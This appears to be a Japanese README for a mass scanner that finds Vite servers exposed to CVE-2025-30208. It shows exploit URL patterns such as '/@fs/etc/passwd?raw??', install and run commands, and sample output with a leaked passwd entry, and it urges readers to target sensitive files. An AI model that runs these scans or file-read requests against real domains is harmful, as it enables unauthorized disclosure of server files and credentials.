
CVE-2025-30208 ViteVulnScanner
やあ、これは keklick1337 作の、Vite の CVE-2025-30208 に脆弱なドメインを探すためのクールなマルチスレッド Python スクリプトだ。基本的に、@fs エンドポイントに ?raw?? または ?import&raw?? を付けてランダムなファイルを取得できるかどうかをチェックする。/etc/passwd の漏えいやその他のおいしい情報を想像してくれ。偽陽性をうまくフィルタリングして無駄な時間を省き、結果の出力方法も調整できるオプション付きだ。
<head> と <body> を含むレスポンスは、正当な感じでない限り除外する。sourcemappingurl または export default を見つけて本物かどうか確認する。results_good.txt、results_maybe_good.txt、results_bad.txt)。-u で URL も出力に含められる。requestsurllib3git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
cd CVE-2025-30208-ViteVulnScanner
pip install requests urllib3
path_list.txt: チェックするパスを1行に1つ(例: /etc/passwd)。domains.txt: スキャンするドメインを1行に1つ(例: example.com)。こんな感じで実行する:
python3 CVE-2025-30208.py <domains_file> [options]
<domains_file>: ドメインリスト(ファイルがなければスキャンできない、当たり前だ)。-t, --threads: 使用するスレッド数(デフォルト: 10)。-p, --protocol: http か https を強制する。省略すると両方試す。-u, --urls: 脆弱な URL を出力に含める。-o, --output: ファイルのベース名(デフォルト: results)。-f, --format: txt は分割ファイル、jsonl は1つの大きなファイル(デフォルト: txt)。python3 CVE-2025-30208.py domains.txt
python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
python3 CVE-2025-30208.py domains.txt -t 5 -p https
-f txt)results_good.txt: 確実にやばいやつ(sourcemappingurl または export default を含む)。results_maybe_good.txt: 脆弱性の可能性はあるが、確定的な証拠はないやつ。results_bad.txt: 問題なし、安心。-u を付けると URL がタブ(\t)区切りで追加される。-u 付きの results_good.txt のサンプル:example.com https://example.com/@fs/etc/passwd?raw??
-f jsonl)results_good.jsonl、results_maybe_good.jsonl、results_bad.jsonl。domain: スキャンしたドメイン。status: VULNERABLE、MAYBE VULNERABLE、または BAD。url(-u 指定時): やばい場所の URL。response: サーバーが返したレスポンス。results_good.jsonl のサンプル:{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake)にリクエストを送る。<head> と <body> が返ってきたらアウト — サーバーがただのクソ野郎ってだけだ。path_list.txt のすべてのパスを @fs/<path>?raw?? と ?import&raw?? で試す。<head> と <body> を含む HTML? そんなのはスキップ。sourcemappingurl または export default がある? ボン、GOOD。MAYBE_GOOD。BAD。urllib3.disable_warnings())なので、証明書について文句は言わない。外では気をつけろ。path_list.txt を調整してくれ — 機密ファイルが本当の狙い目だ。よく聞け: これは教育目的専用だ、兄弟。これで何かやらかしても、捕まっても、誰かを怒らせても、俺は責任を取らない。学ぶために使え、クソ野郎になるな。リスクは全部お前の責任だ、くそったれ — 俺はコードを置いてるだけだ。
アイデアある?バグ見つけた?Issue か Pull Request で教えてくれ。偽陽性をもっと減らせる方法やクールな機能のアイデアがあれば、この野獣をもっとヤバくしようぜ。